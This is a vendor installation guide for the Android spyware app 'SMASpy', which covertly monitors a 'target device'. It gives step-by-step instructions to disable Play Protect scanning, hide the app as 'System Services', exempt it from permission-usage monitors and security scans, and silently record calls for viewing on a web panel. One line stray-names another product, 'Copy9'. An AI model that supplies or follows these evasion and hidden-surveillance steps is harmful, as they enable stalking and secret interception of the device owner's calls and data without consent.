Installation Guide

Follow the steps listed below to install SMASpy on your target Android device. Please note, the steps below are considered common for most Android phones, however, if you don't find the same settings, try the same options with different names. 

1. Pre-Installation & Configuration

If you want to install apps on the target device, you must Disable Play Protect. Follow each step below.

1.1 Disable Play Protect

Open "Play Store" application => Tap on Menu button => Select "Play Protect" => Select "Settings icon" => Disable "Scan device for security threats".

  

Don't worry, this actions won't harm your target device! But these simple steps will activate Copy9 on your target device and you will start receiving information to your dashboard immediately.

1.2 Disable Google Play Store Notifications

This is to avoid warnings which may otherwise randomly appear. Disabling Notifications does not disable Play Store or prevent normal app updates.

 

1.3 Turn On Install Unkown Apps

                           

 

          

2. Install SMASpy application

Download the application by clicking (Download) and installing the application after the application download is complete, you will follow the next steps as in the images below (screenshot).

             

 

               

 

                  

 

                        

             

                  

3. After Installing SMASpy

Note: The points listed below will only apply after you install SMASpy on the target device. You can see "System services", after you buy and install the application successfully.

If you cannot find any of the following settings at a specified location, you can also use the Search option available in the Settings application to locate it.

Configuration for Samsung devices:

For Android OS 7 and above.

1. Go to Settings => Device maintenance => Battery => Unmonitored apps => Add System Service in unmonitored apps list.


For Android OS 8

2. Go to Settings => Lock screen & security => App permission monitor => Turn off System Services.


For Android OS 9 and 10

3. Go back to Settings => Click on Biometrics and Security => Click on Permission usage monitor => Turn off System Services.

Below settings has to be done for both side call recording on non-rooted device (Android 9 only).

4. Open Phone dialer from home screen => Click on three dots on the top of the right corner => Click on Settings.

4.1. Click on Record calls => Turn off notifications => Turn on Auto record Calls.


5. Finally Login in to smaspy.com/cpanel to start monitoring.

Configuration for Xiaomi devices:

1. Go to Settings => Permissions => Autostart => Turn  on System Services.

2. Go To Settings => Permissions => Other Permissions => System Services => Turn On all permissions

3. Go to Settings => Battery => Manage apps battery usage => Choose Apps => System Services => No restrictions.

4. Go back to Battery => Battery usage > Click on Settings icon => Turn off mobile data when device is locked => Never.

    Clear cache when device is locked => Never.

5. Battery drain notifications => Turn off.

6. Go to settings => Additional settings => Click on Quick ball => Turn on Quick ball.

7. Turn Off Move aside when full screen

8. Turn Off Stick to the edge after 3 second of inactivity.

9. Again Turn off Quick ball.


Security & Cleaner

10. Open Security App => Click on settings icon => Boost speed => Lock apps => System Services => Turn on.

11. Open Security App => Click on Deep clean icon (top-right corner) => Click on settings icon (top-right corner) => Cleaner => Remind to clean => Turn off.

12. Open Security App => Click on Deep clean icon (top-right corner) => Click on settings icon (top-right corner) => Cleaner > Update automatically => Turn Off.

13. Open Security App => Security scan => Auto updates => Turn off.

Below settings has to be done for both side call recording on non-rooted device (Android 9 only).

14. Open Phone dialer from home screen => Click on Menu button => Go to Call recordings.

15. Turn off call recordings notifications.

16. Turn on Record calls automatically.

17. And select all numbers.


18. Finally Login in to smaspy.com/cpanel to start monitoring.
